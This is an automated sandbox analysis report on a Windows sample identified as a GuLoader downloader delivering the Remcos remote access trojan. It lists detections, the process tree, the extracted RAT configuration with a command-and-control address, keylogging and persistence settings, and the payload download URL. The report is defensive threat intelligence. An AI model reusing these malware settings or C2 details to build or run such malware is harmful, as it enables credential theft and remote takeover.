Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
orders_PI 008-01.exe

Overview

General Information

Sample name:orders_PI 008-01.exe
Analysis ID:1548262
MD5:5009d8c72623d30ce09149187c66d37c
SHA1:5c6035f099f16ff4753198e5f631ba410e98227f
SHA256:e38bdd8374c7e1640e8fe34c531228dd9389affb9659cb7c49c00129baa73bdf
Tags:exeuser-lowmal3
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected Remcos RAT
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Installs a global keyboard hook
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • orders_PI 008-01.exe (PID: 7796 cmdline: "C:\Users\user\Desktop\orders_PI 008-01.exe" MD5: 5009D8C72623D30CE09149187C66D37C)
    • orders_PI 008-01.exe (PID: 8112 cmdline: "C:\Users\user\Desktop\orders_PI 008-01.exe" MD5: 5009D8C72623D30CE09149187C66D37C)
      • orders_PI 008-01.exe (PID: 7460 cmdline: "C:\Users\user\Desktop\orders_PI 008-01.exe" /stext "C:\Users\user\AppData\Local\Temp\zwewot" MD5: 5009D8C72623D30CE09149187C66D37C)
      • orders_PI 008-01.exe (PID: 7484 cmdline: "C:\Users\user\Desktop\orders_PI 008-01.exe" /stext "C:\Users\user\AppData\Local\Temp\jqrhomwbo" MD5: 5009D8C72623D30CE09149187C66D37C)
      • orders_PI 008-01.exe (PID: 7532 cmdline: "C:\Users\user\Desktop\orders_PI 008-01.exe" /stext "C:\Users\user\AppData\Local\Temp\msxapegdbomic" MD5: 5009D8C72623D30CE09149187C66D37C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["162.251.122.106:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-BHLA3T", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000003.00000002.3887015432.0000000003572000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000003.00000002.3887015432.000000000358D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000003.00000002.3879351770.000000000019F000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000000.00000002.1643832066.00000000046DE000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Process Memory Space: orders_PI 008-01.exe PID: 8112JoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
              Click to see the 2 entries

              Sigma Signatures

              Stealing of Sensitive Information

              barindex
              Sigma detected: Remcos
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\orders_PI 008-01.exe, ProcessId: 8112, TargetFilename: C:\ProgramData\remcos\logs.dat

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-04T09:27:22.500689+010020229301A Network Trojan was detected20.109.210.53443192.168.2.849705TCP
              2024-11-04T09:28:01.311250+010020229301A Network Trojan was detected20.109.210.53443192.168.2.849713TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-04T09:27:36.768609+010020365941Malware Command and Control Activity Detected192.168.2.849710162.251.122.1062404TCP
              2024-11-04T09:27:37.564253+010020365941Malware Command and Control Activity Detected192.168.2.849711162.251.122.1062404TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-04T09:27:37.819920+010028033043Unknown Traffic192.168.2.849712178.237.33.5080TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-04T09:27:31.787759+010028032702Potentially Bad Traffic192.168.2.849709212.162.149.3880TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: orders_PI 008-01.exeAvira: detected
              Found malware configuration
              Source: 00000003.00000002.3887015432.000000000358D000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["162.251.122.106:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-BHLA3T", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
              Multi AV Scanner detection for submitted file
              Source: orders_PI 008-01.exeReversingLabs: Detection: 13%
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000003.00000002.3887015432.0000000003572000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3887015432.000000000358D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3879351770.000000000019F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: orders_PI 008-01.exe PID: 8112, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 5_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,5_2_00404423
              Source: orders_PI 008-01.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: orders_PI 008-01.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 0_2_0040674C FindFirstFileW,FindClose,0_2_0040674C
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 0_2_00405B00 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405B00
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 3_2_344B10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,LdrInitializeThunk,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,3_2_344B10F1
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 3_2_344B6580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,LdrInitializeThunk,3_2_344B6580
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 5_2_0040AE51 FindFirstFileW,FindNextFileW,5_2_0040AE51
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 6_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,6_2_00407EF8
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 7_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,7_2_00407898

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.8:49710 -> 162.251.122.106:2404
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.8:49711 -> 162.251.122.106:2404
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorIPs: 162.251.122.106
              Source: global trafficTCP traffic: 192.168.2.8:49710 -> 162.251.122.106:2404
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
              Source: Joe Sandbox ViewASN Name: UNREAL-SERVERSUS UNREAL-SERVERSUS
              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.8:49712 -> 178.237.33.50:80
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49709 -> 212.162.149.38:80
              Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.8:49705
              Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.8:49713
              Source: global trafficHTTP traffic detected: GET /LnGWkyvzVtM166.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 212.162.149.38Cache-Control: no-cache
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.38
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.38
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.38
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.38
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.38
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.38
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.38
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.38
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.38
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.38
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.38
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.38
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.38
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.38
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.38
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.38
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.38
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.38
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.38
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.38
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.38
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.38
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.38
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.38
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.38
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.38
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.38
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.38
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.38
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.38
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.38
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.38
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.38
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.38
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.38
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.38
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.38
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.38
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.38
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.38
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.38
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.38
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.38
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.38
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.38
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.38
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.38
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.38
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.38
              Source: unknownTCP traffic detected without corresponding DNS query: 212.162.149.38
              Source: global trafficHTTP traffic detected: GET /LnGWkyvzVtM166.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 212.162.149.38Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: orders_PI 008-01.exe, 00000003.00000002.3908240272.0000000034480000.00000040.10000000.00040000.00000000.sdmp, orders_PI 008-01.exe, 00000007.00000002.1761634918.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: orders_PI 008-01.exe, 00000005.00000002.1773456088.0000000002258000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: file://192.168.2.1/all/install/setup.au3https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
              Source: orders_PI 008-01.exe, 00000005.00000002.1773456088.0000000002258000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: file://192.168.2.1/all/install/setup.au3https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
              Source: orders_PI 008-01.exe, orders_PI 008-01.exe, 00000007.00000002.1761634918.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: orders_PI 008-01.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: orders_PI 008-01.exe, 00000003.00000002.3907921678.0000000033F20000.00000040.10000000.00040000.00000000.sdmp, orders_PI 008-01.exe, 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
              Source: orders_PI 008-01.exe, 00000003.00000002.3907921678.0000000033F20000.00000040.10000000.00040000.00000000.sdmp, orders_PI 008-01.exe, 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: geoplugin.net
              Source: orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003572000.00000004.00000020.00020000.00000000.sdmp, orders_PI 008-01.exe, 00000003.00000002.3887463700.00000000051F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.38/LnGWkyvzVtM166.bin
              Source: orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003572000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.162.149.38/LnGWkyvzVtM166.binV
              Source: bhv2901.tmp.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertCloudServicesCA-1.crt0
              Source: bhv2901.tmp.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: bhv2901.tmp.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: bhv2901.tmp.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
              Source: bhv2901.tmp.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
              Source: bhv2901.tmp.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
              Source: bhv2901.tmp.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
              Source: bhv2901.tmp.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
              Source: bhv2901.tmp.5.drString found in binary or memory: http://cacerts.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crt0
              Source: bhv2901.tmp.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertCloudServicesCA-1-g1.crl0?
              Source: bhv2901.tmp.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: bhv2901.tmp.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: bhv2901.tmp.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
              Source: bhv2901.tmp.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
              Source: bhv2901.tmp.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
              Source: bhv2901.tmp.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
              Source: bhv2901.tmp.5.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
              Source: bhv2901.tmp.5.drString found in binary or memory: http://crl3.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0H
              Source: bhv2901.tmp.5.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
              Source: bhv2901.tmp.5.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
              Source: bhv2901.tmp.5.drString found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0
              Source: bhv2901.tmp.5.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: bhv2901.tmp.5.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
              Source: bhv2901.tmp.5.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
              Source: bhv2901.tmp.5.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
              Source: bhv2901.tmp.5.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
              Source: bhv2901.tmp.5.drString found in binary or memory: http://crl4.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0
              Source: orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003572000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003572000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp#
              Source: orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003572000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp:
              Source: orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003572000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpI
              Source: orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003572000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpV
              Source: orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003572000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpeu
              Source: orders_PI 008-01.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: bhv2901.tmp.5.drString found in binary or memory: http://ocsp.digicert.com0
              Source: bhv2901.tmp.5.drString found in binary or memory: http://ocsp.digicert.com0:
              Source: bhv2901.tmp.5.drString found in binary or memory: http://ocsp.digicert.com0H
              Source: bhv2901.tmp.5.drString found in binary or memory: http://ocsp.digicert.com0I
              Source: bhv2901.tmp.5.drString found in binary or memory: http://ocsp.digicert.com0Q
              Source: bhv2901.tmp.5.drString found in binary or memory: http://ocsp.msocsp.com0
              Source: bhv2901.tmp.5.drString found in binary or memory: http://ocsp.msocsp.com0S
              Source: bhv2901.tmp.5.drString found in binary or memory: http://ocspx.digicert.com0E
              Source: bhv2901.tmp.5.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: bhv2901.tmp.5.drString found in binary or memory: http://www.digicert.com/CPS0~
              Source: orders_PI 008-01.exe, orders_PI 008-01.exe, 00000007.00000002.1761634918.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
              Source: orders_PI 008-01.exe, orders_PI 008-01.exe, 00000007.00000003.1760994142.00000000007CD000.00000004.00000020.00020000.00000000.sdmp, orders_PI 008-01.exe, 00000007.00000003.1761352653.00000000007CD000.00000004.00000020.00020000.00000000.sdmp, orders_PI 008-01.exe, 00000007.00000002.1761634918.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
              Source: orders_PI 008-01.exe, 00000007.00000003.1760994142.00000000007CD000.00000004.00000020.00020000.00000000.sdmp, orders_PI 008-01.exe, 00000007.00000003.1761352653.00000000007CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comata
              Source: orders_PI 008-01.exe, 00000003.00000002.3908240272.0000000034480000.00000040.10000000.00040000.00000000.sdmp, orders_PI 008-01.exe, 00000007.00000002.1761634918.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: orders_PI 008-01.exe, 00000003.00000002.3908240272.0000000034480000.00000040.10000000.00040000.00000000.sdmp, orders_PI 008-01.exe, 00000007.00000002.1761634918.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
              Source: orders_PI 008-01.exe, 00000005.00000002.1771684606.0000000000193000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
              Source: orders_PI 008-01.exe, 00000007.00000002.1761634918.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
              Source: bhv2901.tmp.5.drString found in binary or memory: https://07ab41ecf42bc570255fdecc8dea3fa9.azr.footprintdns.com/apc/trans.gif?5b3bec92835bc024c52f96dd
              Source: bhv2901.tmp.5.drString found in binary or memory: https://07ab41ecf42bc570255fdecc8dea3fa9.azr.footprintdns.com/apc/trans.gif?f0f7e1407b69bd65640be717
              Source: bhv2901.tmp.5.drString found in binary or memory: https://7da35b81493d6264eefb208fce0c5757.azr.footprintdns.com/apc/trans.gif?f343d3a8731ffea490b8b5c3
              Source: bhv2901.tmp.5.drString found in binary or memory: https://7da35b81493d6264eefb208fce0c5757.azr.footprintdns.com/apc/trans.gif?f92d19bcbba8eb1999dabbc8
              Source: bhv2901.tmp.5.drString found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=LO
              Source: bhv2901.tmp.5.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
              Source: bhv2901.tmp.5.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
              Source: bhv2901.tmp.5.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
              Source: bhv2901.tmp.5.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
              Source: bhv2901.tmp.5.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
              Source: bhv2901.tmp.5.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
              Source: bhv2901.tmp.5.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
              Source: bhv2901.tmp.5.drString found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
              Source: bhv2901.tmp.5.drString found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
              Source: bhv2901.tmp.5.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
